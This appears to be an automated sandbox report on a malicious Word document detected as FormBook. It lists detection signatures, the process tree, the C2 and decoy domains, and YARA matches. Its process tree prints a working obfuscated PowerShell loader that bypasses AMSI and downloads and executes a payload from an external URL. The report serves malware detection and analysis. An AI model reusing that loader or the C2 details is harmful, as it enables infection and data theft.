Play interactive tour

Edit tour

Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Sample Name:	RFQ-CIF DT22.doc
Analysis ID:	532827
MD5:	66c72e808d6803f22fcd6ec419a6f039
SHA1:	0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
SHA256:	0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
Tags:	docFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document contains OLE streams which likely are hidden ActiveX objects

Sigma detected: Office product drops script at suspicious location

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Maps a DLL or memory area into another process

Sigma detected: Suspicious Script Execution From Temp Folder

Document contains OLE streams with names of living off the land binaries

Creates processes via WMI

Found potential equation exploit (CVE-2017-11882)

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Sigma detected: WScript or CScript Dropper

Sample uses process hollowing technique

Writes to foreign memory regions

Sigma detected: Microsoft Office Product Spawning Windows Shell

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Very long command line found

Microsoft Office drops suspicious files

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Found suspicious RTF objects

Antivirus or Machine Learning detection for unpacked file

Document has an unknown application name

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Document contains Microsoft Equation 3.0 OLE entries

Enables debug privileges

Document contains no OLE stream with summary information

Found inlined nop instructions (likely shell or obfuscated code)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Office Equation Editor has been started

Creates a window with clipboard capturing capabilities

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2704 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cmd.exe (PID: 2996 cmdline: CmD.exe /C cscript %tmp%\Client.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2700 cmdline: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)

powershell.exe (PID: 1344 cmdline: Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,50,48,54,48,55,50,48,52,53,53,55,56,47,109,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($91534784575270519153478457527051915347845752705191534784575270519153478457527051)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

calc.exe (PID: 2008 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cscript.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 2408 cmdline: /c del "C:\WINDOWS\syswow64\calc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp	rtf_cve2017_11882_ole	Attempts to identify the exploit CVE 2017 11882	John Davison	0x3000:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A 0x3021:$font: 0A 01 08 5A 5A 0x3052:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp	EXP_potential_CVE_2017_11882	unknown	ReversingLabs	0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1 0x2f00:$equation1: Equation Native 0x920:$equation2: Microsoft Equation 3.0 0x3029:$exe: .exe 0x3052:$address: 12 0C 43 00

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4849:$sqlite3step: 68 34 1C 7B E1 0x495c:$sqlite3step: 68 34 1C 7B E1 0x4878:$sqlite3text: 68 38 2A 90 C5 0x499d:$sqlite3text: 68 38 2A 90 C5 0x488b:$sqlite3blob: 68 53 D8 7F 8C 0x49b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4849:$sqlite3step: 68 34 1C 7B E1 0x495c:$sqlite3step: 68 34 1C 7B E1 0x4878:$sqlite3text: 68 38 2A 90 C5 0x499d:$sqlite3text: 68 38 2A 90 C5 0x488b:$sqlite3blob: 68 53 D8 7F 8C 0x49b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.calc.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.0.calc.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.0.calc.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
11.0.calc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.0.calc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
